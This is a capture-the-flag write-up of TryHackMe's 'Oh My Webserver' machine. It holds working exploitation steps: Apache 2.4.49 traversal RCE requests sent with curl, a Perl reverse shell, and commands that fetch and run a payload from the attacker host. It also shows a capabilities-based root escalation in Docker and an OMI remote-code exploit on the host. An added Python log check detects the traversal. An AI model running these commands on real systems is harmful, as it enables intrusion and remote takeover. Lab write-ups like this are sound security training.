This is my writeup for the Oh My Webserver room/machine of the TryHackMe.com platform. Remember this is just how I solved/owned the machine, maybe there are different and fast paths but…
Machine
Can you root me?
The machine is rated as a medium machine, and if you're looking for a good machine… go for it. Thanks a lot to tinyb0y for this machine! Thanks a lot also to the great cyberaguiar, who helped me reach the proper vector (after the first, unintended way to exploit the machine)! If you want to discuss it or if you have any problem, just send me a message on Discord (user kraba#4968).
The techniques used on this machine, beyond a small enumeration:
Recon
Point 0: the IP of the server was 10.10.10.133 when I did this; when you read it, just replace it with yours.
First of all I ran a classic nmap scan:
```
nmap -sC -sV -p- 10.10.10.133
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-05 11:51 GMT
Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 16.59% done; ETC: 11:53 (0:02:06 remaining)
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 74.53% done; ETC: 11:53 (0:00:30 remaining)
Nmap scan report for 10.10.10.133
Host is up (0.032s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
|   256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
|_  256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.49 (Unix)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
I'm looking at a Linux machine with two open ports: 22 and 80.
When I browse port 80 I just reach the default Apache home page:
```
curl http://10.10.10.133
<html><body><h1>It works!</h1></body></html>
```
I ran several gobuster, dirb, ffuf and wfuzz scans… nothing, there is nothing!
But wait, let me check the Apache version… it sounds familiar: 2.4.49. Oh, CVE-2021-41773!
You may find other working exploits, but what we need here is just cURL.
According to the mr-exo GitHub page I can just run:
```
curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
```
Let’s try it:
```
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami'
daemon
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
```
It's working! Let's upload a shell and gain access. I use a Perl one because, after a few checks, it turns out to be a Docker image and I don't know how much software is installed:
```
vi shell.sh
perl -e 'use Socket;$i="10.11.55.171";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
and I run 3 cURL requests:
```
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;curl http://10.11.55.171/shell.sh -o /tmp/shell.sh'
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;chmod +x /tmp/shell.sh'
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;sh /tmp/shell.sh'
```
and my netcat listener gets a connection:
```
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.10.133] 36344
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
daemon@f1984047b638:/$
```
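From the defender's side, the traversal requests above leave a clear trace in the Apache access log, but only if the path is decoded more than once: `.%%32%65` becomes `.%2e` after one round and `..` after the second. This added example (not from the original writeup) runs that check over a few constructed combined-format log lines and reports the requests whose fully decoded path climbs out of the document root.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2022:11:55:01 +0000] "GET / HTTP/1.1" 200 45 "-" "curl/7.81.0"
10.0.0.5 - - [05/Mar/2022:11:55:09 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 46 "-" "curl/7.81.0"
10.0.0.5 - - [05/Mar/2022:11:55:20 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1220 "-" "curl/7.81.0"
10.0.0.6 - - [05/Mar/2022:11:56:02 +0000] "GET /icons/ubuntu-logo.png HTTP/1.1" 200 3623 "-" "Mozilla/5.0"
"""

# Pull method and request path out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def decode_fully(path, max_rounds=4):
    """Percent-decode until the string stops changing (bounded to max_rounds).
    A single unquote() turns %%32%65 into %2e; the '..' only appears on round two."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(path):
    """True if any segment of the fully decoded path (query string dropped) is '..'."""
    decoded = decode_fully(path.split("?", 1)[0])
    return any(segment == ".." for segment in decoded.split("/"))


def find_traversal_requests(log_text):
    """Return (method, raw_path, decoded_path) for every request that traverses upward."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and is_traversal(match.group("path")):
            raw = match.group("path")
            hits.append((match.group("method"), raw, decode_fully(raw)))
    return hits


if __name__ == "__main__":
    for method, raw, decoded in find_traversal_requests(SAMPLE_LOG):
        print(f"{method} {raw} -> {decoded}")
```

A plain `grep '\.\./'` misses both malicious lines here, which is why the decode loop matters; a WAF or log rule that decodes only once misses the double-encoded variant as well.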
PE to root on docker
As usual I used linpeas.sh (I'm lazy on Saturdays) and I found a super fast PE to root inside the Docker image:
```
Files with capabilities (limited to 50):
/usr/bin/python3.7 = cap_setuid+ep
```
As usual, GTFOBins has a way to use it:
```
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
id
uid=0(root) gid=1(daemon) groups=1(daemon)
# cd /root
cd /root
# ls -ltra
ls -ltra
total 28
-rw-r--r-- 1 root root   570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root   148 Aug 17  2015 .profile
drwxr-xr-x 3 root root   4096 Oct  8 05:37 .cache
lrwxrwxrwx 1 root root      9 Oct  8 05:43 .bash_history -> /dev/null
-rw-r--r-- 1 root root     38 Oct  8 05:47 user.txt
drwxr-xr-x 1 root root   4096 Oct  8 08:22 ..
-rw------- 1 root daemon   12 Oct  8 08:28 .python_history
drwx------ 1 root root   4096 Oct  8 08:28 .
# cat user.txt
cat user.txt
THM{REDACTED}
```
Well! First flag done!
PE to root
After further research, checks, enumeration and so on… nothing was "pretty clear".
I'm inside a Docker container, and every way to escalate or break out that I know of was checked… no way! Thanks to cyberaguiar I found the way.
Inside Docker nothing seems to be listening except port 80:
```
root@4a70924bafa0:/tmp# netstat -tulpn
netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
```
and my IP is 172.17.0.2:
```
root@4a70924bafa0:/tmp# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 4861  bytes 6267674 (5.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 133875  bytes 9894711 (9.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```
Why not check the host IP 172.17.0.1 (the one that runs Docker)?
Nmap is not installed, so I grabbed a static binary from the andrew-d GitHub page (or better, here) and ran it:
```
root@4a70924bafa0:/bin# cd /tmp
root@4a70924bafa0:/tmp# curl 10.11.55.171/nmap -o nmap
root@4a70924bafa0:/tmp# chmod +x nmap
root@4a70924bafa0:/tmp# ./nmap -sT -p- 172.17.0.1
Host is up (0.0044s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
5985/tcp closed unknown
5986/tcp open   unknown
MAC Address: 02:42:19:6E:E8:C1 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 105.07 seconds
```
Hmm, interesting! Port 5986 is open, and it is reachable only locally (the first nmap from outside showed only 22 and 80).
Let's check what this port is used for on HackTricks:
OMI is an open-source remote configuration management tool developed by Microsoft. OMI agents are commonly found installed on Azure Linux servers…
Ah! Good! This machine is a "replica" of an Azure Linux server running Docker and a service called the OMI agent. At the end of the page there is some useful info: there is a CVE. Other useful links are this one and this one.
Let's look for an exploit on GitHub: there are two options, the horizon3ai one and the AlteredSecurity one. The exploits are pretty much the same, or at least do the same thing… I chose the second one and saved the .py on my box.
I try to run it:
```
root@4a70924bafa0:/tmp# curl 10.11.55.171/exploit.py -o exp.py
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "whoami"
root
```
And it's working. Let's grab the flag and run a reverse shell (the same one used at the beginning):
```
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "cat /root/root.txt"
THM{REDACTED}
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "curl http://10.11.55.171/shell.sh -o /tmp/shell.sh"
None
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "chmod +x /tmp/shell.sh"
None
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "sh /tmp/shell.sh"
```
and on my listener:
```
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.10.133] 51410
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux ubuntu 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
# cd /root
# ls -ltra
total 56
-rw-r--r--  1 root root   161 Dec  5  2019 .profile
-rw-r--r--  1 root root  3106 Dec  5  2019 .bashrc
drwxr-xr-x 20 root root  4096 Sep 30 05:05 ..
drwx------  2 root root  4096 Sep 30 05:19 .ssh
drwxr-xr-x  3 root root  4096 Sep 30 05:20 snap
-rw-------  1 root root  1024 Sep 30 05:53 .rnd
-rw-r--r--  1 root root   277 Oct  8 04:33 .wget-hsts
-rw-------  1 root root 12125 Oct  8 05:05 .viminfo
-rw-r--r--  1 root root    38 Oct  8 05:48 root.txt
-rw-------  1 root root   169 Oct  8 08:24 .bash_history
drwxr-xr-x  3 root root  4096 Feb 23 05:20 .local
drwx------  5 root root  4096 Feb 23 05:20 .
# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:42245         0.0.0.0:*               LISTEN      678/containerd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1161/docker-proxy
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      624/systemd-resolve
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      751/sshd: /usr/sbin
tcp6       0      0 :::80                   :::*                    LISTEN      1173/docker-proxy
tcp6       0      0 :::22                   :::*                    LISTEN      751/sshd: /usr/sbin
tcp6       0      0 :::5986                 :::*                    LISTEN      941/omiengine
udp        0      0 127.0.0.53:53           0.0.0.0:*                           624/systemd-resolve
udp        0      0 10.10.191.31:68         0.0.0.0:*                           621/systemd-network
```
Machine done!